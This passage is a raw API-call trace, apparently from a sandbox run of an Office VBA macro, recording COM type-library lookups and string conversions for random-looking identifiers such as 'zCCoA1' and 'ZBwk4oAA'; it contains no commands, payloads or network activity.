IUnknown:Release (This=0x631b4c0) returned 0xb [0068.397] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.397] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zCCoA1", lHashVal=0x10879e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.397] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.397] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.397] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zCCoA1", lHashVal=0x10879e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.397] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2332, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="zCCoA1") returned 7 [0068.397] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zCCoA1", lHashVal=0x10879e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.397] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.397] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba2332 | out: _Dst=0x67c2d60) returned 0x0 [0068.397] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zCCoA1") returned 0x100208 [0068.397] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_zCCoA1" | out: _Dst="_B_var_zCCoA1") returned 0x0 [0068.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_zCCoA1") returned 14 [0068.397] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.397] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zCCoA1", lHashVal=0x100208, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.397] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.397] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.397] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zCCoA1", lHashVal=0x100208, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.398] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.398] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.398] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zCCoA1", lHashVal=0x100208, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.398] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.398] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.398] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zCCoA1", lHashVal=0x100208, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.398] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.398] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.398] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1672, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_zCCoA1") returned 14 [0068.398] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zCCoA1", lHashVal=0x100208, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0068.398] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2332 | out: _Dst=0x145020) returned 0x0 [0068.398] IMalloc:Realloc (This=0x7fefec05380, pv=0xafa7bd0, cb=0x800) returned 0x62ba930 [0068.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba235a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZBwk4oAA") returned 9 [0068.398] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZBwk4oAA", lHashVal=0x106f59, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba235a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZBwk4oAA") returned 9 [0068.398] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZBwk4oAA", lHashVal=0x106f59, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba235a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZBwk4oAA") returned 9 [0068.398] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZBwk4oAA", lHashVal=0x106f59, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.398] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBwk4oAA") returned 0x106f59 [0068.398] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="ZBwk4oAA" | out: _Dst="ZBwk4oAA") returned 0x0 [0068.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="ZBwk4oAA") returned 9 [0068.398] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.398] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZBwk4oAA", lHashVal=0x106f59, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.399] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.399] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.399] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZBwk4oAA", lHashVal=0x106f59, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.399] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.399] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.399] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZBwk4oAA", lHashVal=0x106f59, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.399] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.399] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.399] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZBwk4oAA", lHashVal=0x106f59, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.399] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba235a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZBwk4oAA") returned 9 [0068.399] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZBwk4oAA", lHashVal=0x106f59, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.399] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.399] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba235a | out: _Dst=0x67c2d60) returned 0x0 [0068.399] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZBwk4oAA") returned 0x1046e2 [0068.399] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_ZBwk4oAA" | out: _Dst="_B_var_ZBwk4oAA") returned 0x0 [0068.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZBwk4oAA") returned 16 [0068.399] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.399] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZBwk4oAA", lHashVal=0x1046e2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.399] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.399] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.399] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZBwk4oAA", lHashVal=0x1046e2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.399] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.399] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.399] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZBwk4oAA", lHashVal=0x1046e2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.399] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.399] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.399] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZBwk4oAA", lHashVal=0x1046e2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.399] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.399] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.399] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc16a2, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_ZBwk4oAA") returned 16 [0068.399] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZBwk4oAA", lHashVal=0x1046e2, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x34006b00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x34006b00000000, pDummy=0x0) returned 0x0 [0068.400] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba235a | out: _Dst=0x145020) returned 0x0 [0068.400] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZAABkoA_", lHashVal=0x10fc69, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2386, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZAABkoA_") returned 9 [0068.400] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZAABkoA_", lHashVal=0x10fc69, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2386, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZAABkoA_") returned 9 [0068.400] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZAABkoA_", lHashVal=0x10fc69, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.400] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZAABkoA_") returned 0x10fc69 [0068.400] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="ZAABkoA_" | out: _Dst="ZAABkoA_") returned 0x0 [0068.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="ZAABkoA_") returned 9 [0068.400] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.400] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZAABkoA_", lHashVal=0x10fc69, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.400] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.400] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.400] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZAABkoA_", lHashVal=0x10fc69, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.400] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.400] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.400] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZAABkoA_", lHashVal=0x10fc69, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.400] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.400] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.400] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZAABkoA_", lHashVal=0x10fc69, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.400] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2386, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="ZAABkoA_") returned 9 [0068.400] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZAABkoA_", lHashVal=0x10fc69, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.401] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.401] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba2386 | out: _Dst=0x67c2d60) returned 0x0 [0068.401] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZAABkoA_") returned 0x10d3f2 [0068.401] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_ZAABkoA_" | out: _Dst="_B_var_ZAABkoA_") returned 0x0 [0068.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZAABkoA_") returned 16 [0068.401] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.401] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZAABkoA_", lHashVal=0x10d3f2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.401] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.401] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.401] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZAABkoA_", lHashVal=0x10d3f2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.401] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.401] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.401] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZAABkoA_", lHashVal=0x10d3f2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.401] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.401] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.401] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZAABkoA_", lHashVal=0x10d3f2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.401] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.401] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.401] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc16d2, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_ZAABkoA_") returned 16 [0068.401] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZAABkoA_", lHashVal=0x10d3f2, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x5a005f00720061, ppTypeComp=0x6b004200000000, pDummy=0x0) returned 0x0 [0068.401] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2386 | out: _Dst=0x145020) returned 0x0 [0068.401] ITypeComp:RemoteBind (in: This=0x665ba60, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2d3a, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0068.402] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2d3a, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0068.402] ITypeComp:RemoteBind (in: This=0x665bd30, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.402] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0068.402] strcpy_s (in: _Dst=0x144e00, _DstSize=0x4, _Src="Hex" | out: _Dst="Hex") returned 0x0 [0068.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=4, lpWideCharStr=0x144c50, cchWideChar=4 | out: lpWideCharStr="Hex") returned 4 [0068.402] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.402] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Hex", lHashVal=0x10989f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=1, pBstrLibName=0x144c50) returned 0x0 [0068.402] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Hex", cchWideChar=-1, lpMultiByteStr=0x144e00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hex", lpUsedDefaultChar=0x0) returned 4 [0068.402] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Hex") returned 0x10989f [0068.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x34d2d3a, cbMultiByte=4, lpWideCharStr=0x144ea0, cchWideChar=5 | out: lpWideCharStr="Hex") returned 4 [0068.402] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="Hex", lHashVal=0x10989f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.402] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d60 [0068.403] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d60) returned 0x0 [0068.403] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.403] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xb, _Src="_B_var_Hex" | out: _Dst="_B_var_Hex") returned 0x0 [0068.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=11, lpWideCharStr=0x144e00, cchWideChar=11 | out: lpWideCharStr="_B_var_Hex") returned 11 [0068.403] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.403] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_Hex", lHashVal=0x1055b0, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=1, pBstrLibName=0x144e00) returned 0x0 [0068.403] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_B_var_Hex", cchWideChar=-1, lpMultiByteStr=0x144fb0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_B_var_Hex", lpUsedDefaultChar=0x0) returned 11 [0068.403] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.403] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.403] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1702, cbMultiByte=11, lpWideCharStr=0x144e60, cchWideChar=12 | out: lpWideCharStr="_B_var_Hex") returned 11 [0068.403] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_Hex", lHashVal=0x1055b0, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e18*=0xaf0b528, pDescKind=0x144e2c*=1, ppFuncDesc=0x144e30, ppVarDesc=0x0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.403] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf0b528, ppTypeAttr=0x144e20, pDummy=0x1 | out: ppTypeAttr=0x144e20, pDummy=0x1) returned 0x0 [0068.403] ITypeInfo:LocalReleaseTypeAttr (This=0xaf0b528) returned 0x0 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b240f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x144c80 | out: ppvObject=0x144c80*=0xaf0b528) returned 0x0 [0068.403] ITypeInfo2:GetFuncIndexOfMemId (in: This=0xaf0b528, memid=1610612737, invkind=1, pFuncIndex=0x144cc0 | out: pFuncIndex=0x144cc0*=0x1) returned 0x0 [0068.403] ITypeInfo2:GetFuncCustData (in: This=0xaf0b528, index=0x1, GUID=0x7fee3b33758*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x144cd8 | out: pVarVal=0x144cd8*(varType=0x0, wReserved1=0x14, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x1055b0)) returned 0x0 [0068.403] IUnknown:Release (This=0xaf0b528) returned 0x1 [0068.403] IUnknown:AddRef (This=0xaf0b528) returned 0x2 [0068.403] ITypeInfo:LocalReleaseFuncDesc (This=0xaf0b528) returned 0x0 [0068.403] IUnknown:Release (This=0xaf0b528) returned 0x1 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144ed8 | out: ppvObject=0x144ed8*=0x0) returned 0x80004002 [0068.403] IUnknown:AddRef (This=0xaf0b528) returned 0x2 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.403] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, 